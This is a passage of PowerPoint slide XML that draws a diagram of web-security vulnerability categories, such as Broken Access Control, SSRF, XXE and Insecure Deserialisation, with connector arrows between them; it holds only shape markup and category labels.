                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Buffer Overflows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-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1214" name="CustomShape 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1FC377C-14E5-A9DF-D8AD-3BAB45C7155D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="320472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5" name="CustomShape 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D622EF2-272F-DA13-5805-82D4C73F4CF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="319860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6" name="CustomShape 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B65420EB-73D1-E05B-593A-2C8FCA81817C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="320472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Broken Access Control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17" name="CustomShape 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CF2438C-04C0-84F1-0F54-E52EB4117270}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238680" y="3700800"/>
            <a:ext cx="91296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8" name="CustomShape 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33871843-D2E9-2511-F5F5-42E3107A3D55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485720" y="3700800"/>
            <a:ext cx="93060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Info Leakage &amp; Improper Error Handling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19" name="CustomShape 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A96ED66-841C-077F-F841-587A588CD472}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="369324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0" name="CustomShape 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B29D777-8FC1-7D96-E05C-1EDC78ABF248}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="370080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Sensitive Data Exposure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1" name="CustomShape 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1149E0E-D817-595B-747C-05DE465B8F83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="370080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Vulnerable &amp; outdated components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2" name="CustomShape 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EE6FF59-781C-27F6-7459-DCF0270E54F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="216360" y="4196880"/>
            <a:ext cx="95724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Improper Error Handling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3" name="CustomShape 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD01B5C4-4077-E846-2519-234BEB5E081F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="419688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Broken Auth. &amp; Session Mngt.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4" name="CustomShape 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{503BDBEC-3F20-4301-1679-24585E6956C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2766240" y="4187880"/>
            <a:ext cx="9291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Cryptographic Storage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5" name="CustomShape 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86FC3A04-7383-3251-635B-A90E0F126271}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="4196880"/>
            <a:ext cx="9259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2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6" name="CustomShape 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{689F891B-8ECA-1F46-946C-B3C7F7275416}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="419688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Missing function level access control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7" name="CustomShape 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7181E853-4E50-8248-7004-E04FACE2A68A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="419688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Identification &amp; Authentication Failures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8" name="CustomShape 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3914493-A47F-B891-63D6-376E6A5B2236}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238680" y="469332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Storage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9" name="CustomShape 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE08F7E9-6554-F9A0-5456-840F7D694CE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="469332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Cryptographic Storage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0" name="CustomShape 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{685E9F85-45D3-A773-548E-52D519CF3D7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="468252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Failure to restrict URL access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1" name="CustomShape 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24D2CC06-6D7E-12AE-416C-4CFFAD338CCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="4693320"/>
            <a:ext cx="93960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Insecure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" strike="noStrike" spc="-1" dirty="0" err="1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Deserialisation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32" name="CustomShape 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FED7A5A3-0DD9-5627-9BFD-9CFC17CFE453}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21567600">
            <a:off x="238320" y="5189400"/>
            <a:ext cx="91296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Denial of Service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33" name="CustomShape 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A360AA9F-5181-C392-B31E-B072CF76DD3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="518940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Communication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4" name="CustomShape 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3F3F180-491E-1E25-03C8-FBB582059EBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="517716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Transport Layer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5" name="CustomShape 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDC26F25-93E1-E3D1-70BB-123F4DA11A8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="518940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Components with known vulnerabilities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6" name="CustomShape 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11D8FAD6-31FE-3B52-9894-5CA196710C19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="518940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Components with known vulnerabilities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7" name="CustomShape 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92FCF87E-4A81-2742-522A-9A962B7A8220}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="518940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Yu Mincho Demibold"/>
              </a:rPr>
              <a:t>Insufficient Logging &amp; Monitoring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8" name="CustomShape 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E08D6988-FA04-9779-164C-F2A79C0E88F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238680" y="568548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solidFill>
              <a:srgbClr val="FFD8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Config.  Management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9" name="CustomShape 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{809C810A-9F2C-6C28-8281-E90D590CBD1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="568548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Failure to restrict URL access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40" name="CustomShape 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66BB846E-DE82-7AA6-5685-6C2643DA9E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="567180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Unvalidated Redirects and Forwards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41" name="CustomShape 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6D379A7-C2B2-BA27-97F0-34011850B194}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5339520" y="5688319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Insufficient Logging &amp; Monitoring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42" name="CustomShape 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{297E8939-09F8-4DFB-1E62-9D9FE99DC1F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="568548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Unvalidated Redirects and Forwards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43" name="CustomShape 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FCAB629-B40B-6ADF-4854-085F2E08F616}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="5685480"/>
            <a:ext cx="924480" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wdUpDiag">
            <a:fgClr>
              <a:srgbClr val="92D050"/>
            </a:fgClr>
            <a:bgClr>
              <a:srgbClr val="FFE575"/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SSRF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4" name="CustomShape 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E49A3B11-97DF-4BCA-12C4-565BF9476F4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5339520" y="2711520"/>
            <a:ext cx="92592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XXE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="11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5" name="CustomShape 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A57AE6E-10EF-E893-D167-C538ED9479DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038120" y="320472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46" name="CustomShape 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEB25F57-0556-2D1F-2ED7-9E4324EB8D6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5324040" y="370080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47" name="CustomShape 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5529689A-A4A8-560F-447F-4A8AE2CA3C7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6590880" y="320472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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1249" name="Connector: Curved 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{773C0898-D38A-87D4-0B91-755D3A266B39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1193" idx="3"/>
            <a:endCxn id="1207" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251760" y="1429380"/>
            <a:ext cx="341640" cy="992160"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000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52" name="Connector: Curved 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A31E1D5-6FB7-6439-D804-F004AA886B28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1198" idx="3"/>
            <a:endCxn id="1206" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3695400" y="1924020"/>
            <a:ext cx="343440" cy="497520"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000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53" name="Connector: Curved 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E230301-5408-046D-B76D-0A83DD49B27F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1191" idx="3"/>
            <a:endCxn id="1198" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2416680" y="1429380"/>
            <a:ext cx="349200" cy="494640"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000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54" name="Connector: Curved 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BE748BE-7D12-164A-EBE7-9EE092F44185}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1229" idx="3"/>
            <a:endCxn id="1224" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2416680" y="4397220"/>
            <a:ext cx="349560" cy="50544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55" name="Connector: Curved 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA5B4C48-53DD-1E1E-6C11-DFB1C7ABB913}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1239" idx="3"/>
            <a:endCxn id="1230" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2416680" y="4891860"/>
            <a:ext cx="349200" cy="100296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stealth" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1257" name="Connector: Curved 80">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE77D1F7-DC04-508B-95F6-2246FF1478C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1202" idx="3"/>
            <a:endCxn id="1223" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1151640" y="2421540"/>
            <a:ext cx="333720" cy="1984680"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 30113"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1259" name="Connector: Curved 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B009267-74DF-B498-FEF6-0E03882E4626}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1196" idx="3"/>
            <a:endCxn id="1209" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163880" y="1925460"/>
            <a:ext cx="321120" cy="98784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0" name="Connector: Curved 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54A39397-5452-10CA-0529-60A19E0A1683}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1208" idx="3"/>
            <a:endCxn id="1191" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1151640" y="1429200"/>
            <a:ext cx="334080" cy="1488960"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 54045"/>
              <a:gd name="adj2" fmla="val 49987"/>
              <a:gd name="adj3" fmla="val 46170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61" name="Connector: Curved 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8F072FE-E51D-7E16-B47C-635919DD8788}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1217" idx="3"/>
            <a:endCxn id="1197" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1151640" y="1925280"/>
            <a:ext cx="334080" cy="1985040"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 56252"/>
              <a:gd name="adj2" fmla="val 49990"/>
              <a:gd name="adj3" fmla="val 54999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62" name="Connector: Curved 86">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC423246-6240-BBD1-F645-ABDEAFBE63A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1238" idx="3"/>
            <a:endCxn id="1233" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1151640" y="5398740"/>
            <a:ext cx="33372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3" name="Connector: Curved 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFDAA783-C873-FA7C-907F-0620B20A0182}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1223" idx="3"/>
            <a:endCxn id="1204" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2416680" y="2418660"/>
            <a:ext cx="349200" cy="1987560"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33106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4" name="Connector: Curved 88">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B1036F1-867A-4728-A8F3-727D17E12C7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1226" idx="3"/>
            <a:endCxn id="1216" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4966560" y="3414060"/>
            <a:ext cx="359280" cy="99216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5" name="Connector: Curved 89">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6A565C1-55A2-75E6-B6E9-6390A03B8FC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1220" idx="3"/>
            <a:endCxn id="1205" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4966560" y="2421360"/>
            <a:ext cx="359640" cy="1488960"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50100"/>
              <a:gd name="adj2" fmla="val 49987"/>
              <a:gd name="adj3" fmla="val 49899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6" name="Connector: Curved 90">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F45BC80E-18FA-0D35-AA33-6CF86EA2D815}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1241" idx="3"/>
            <a:endCxn id="1237" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6265440" y="5398740"/>
            <a:ext cx="327960" cy="498919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7" name="Straight Arrow Connector 91">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1684DEA-B690-5414-3B52-DCFCF4FA4C64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3647160" y="1433700"/>
            <a:ext cx="407520" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
